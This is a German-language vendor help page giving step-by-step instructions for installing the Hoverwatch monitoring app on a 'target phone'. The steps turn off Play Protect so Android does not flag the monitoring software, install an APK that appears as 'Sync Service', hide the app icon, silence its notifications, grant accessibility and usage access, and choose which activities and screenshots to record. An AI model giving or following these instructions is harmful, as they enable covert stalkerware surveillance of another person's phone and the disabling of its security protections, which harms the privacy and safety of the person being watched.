Wie installiert man Hoverwatch auf Android

Videoanleitung:

Textanleitung:

1. Bereiten Sie Ihr Ziel-Handy vor

Um zu verhindern, dass Android Fragen über die Aktivität des Überwachungsprogramms stellt:

1. Sie die Anwendung "Play Store"

2. Tippen Sie auf -> Menü -> wählen Sie "Play Protect" -> tippen Sie auf das Symbol Einstellungen.

3. Deaktivieren Sie "Apps mit Play Protect scannen".

2. Laden Sie die App herunter

1. Öffnen Sie Ihren Internet-Browser (Schalten Sie den "Inkognito-Modus" ein, wenn Sie möchten).
2. Geben Sie hoverwatch.com ein.
3. Tippen Sie auf "Kostenlos anmelden" (oder tippen Sie auf "Menü" > "Anmelden").
4. Geben Sie Ihre E-Mail und Ihr Passwort ein.
5. Tippen Sie auf "Kostenlos anmelden" (oder "Einloggen").

3. Installieren Sie die App

1. Tippen Sie auf den Link "App herunterladen" (Wenn Sie die Seite "Gerät hinzufügen" nicht finden können, klicken Sie auf die Schaltfläche "Menü" und dann auf "Gerät hinzufügen").
2. Tippen Sie auf OK.
3. Tippen Sie auf Öffnen (Sie können auch Dateimanager > Downloads > setup.apk öffnen).
4. Wenn Sie dazu aufgefordert werden, tippen Sie auf Einstellungen, um die Installation zuzulassen.
5. Tippen Sie auf Installieren.

4. Das Gerät überwachbar machen

1. Tippen Sie auf Öffnen.
2. Tippen Sie auf Weiter.
3. Wählen Sie die Installationsoption.
4. Bestätigen Sie die Zustimmung des Benutzers.
5. Abhängig von Ihrer Wahl können Sie das Hoverwatch-Symbol am Ende der Installation ausblenden.
6. Tippen Sie auf Weiter.
7. Akzeptieren Sie die rechtlichen Bedingungen.

5. App-Anforderungen einrichten

• Schalten Sie Basisberechtigungen ein.
  • Tippen Sie auf Zulassen, um die Basisberechtigungen zu bestätigen.

1. Schalten Sie den Eingabehilfedienst ein.
2. Tippen Sie auf OK.
3. Tippen Sie auf Installierte (oder heruntergeladene) Dienste.
4. Tippen Sie auf Sync Service.
5. Schalten Sie den Schalter ein und tippen Sie auf Zulassen.
6. Tippen Sie auf die Schaltfläche System zurück, bis Sie zur App zurückkehren.

1. Schalten Sie Zugriff auf Nutzung ein.
2. Tippen Sie auf OK.
3. Blättern Sie nach unten oder verwenden Sie einen Suchbegriff, um die App Sync Service zu finden.
4. Tippen Sie auf Sync Service.
5. Schalten Sie den Schalter ein.
6. Tippen Sie auf die Schaltfläche System zurück, bis Sie zur App zurückkehren.

• Schalten Sie die Überlagerungserlaubnis ein.
  • Schalten Sie den Schalter ein.

• Schalten Sie App-Benachrichtigungen deaktivieren ein.
  • Tippen Sie auf OK.
  • Schalten Sie Benachrichtigungen anzeigen aus.
  • Tippen Sie auf die Schaltfläche System zurück, bis Sie zur App zurückkehren.

• Schalten Sie Batterieoptimierung deaktivieren ein.
  • Tippen Sie auf Zulassen.
  • Tippen Sie auf Weiter.

6. Aktivieren Sie die App

1. Geben Sie die E-Mail und das Passwort Ihres Hoverwatch-Kontos ein.
  2. Tippen Sie auf Aktivieren.

7. Wählen Sie zu verfolgende Aktivitäten

1. Aktivieren Sie die Aktivitäten, die Sie verfolgen möchten.
  2. Tippen Sie auf Zulassen, um die Berechtigungen zu bestätigen.
  3. Tippen Sie auf Weiter.

8. Zusätzliche zu verfolgende Aktivitäten auswählen

1. Wählen Sie zusätzliche zu verfolgende Aktivitäten aus.
  2. Tippen Sie auf Weiter.

9. Aufzuzeichnende Screenshots auswählen

1. Wählen Sie die Arten von Screenshots aus, die Sie aufnehmen möchten.
  2. Tippen Sie auf Jetzt starten.
  3. Tippen Sie auf Weiter.

10. PIN einrichten

1. Richten Sie Ihre PIN ein, um die App zu schützen.
  2. Merken Sie sich die PIN.
  3. Tippen Sie auf Weiter.

Installation abgeschlossen.

Tippen Sie auf Installation beenden.

In 5-6 Minuten erscheinen Informationen vom Gerät in Ihrem Hoverwatch-Konto.

show up

Haben Sie weitere Fragen? Anfrage einreichen.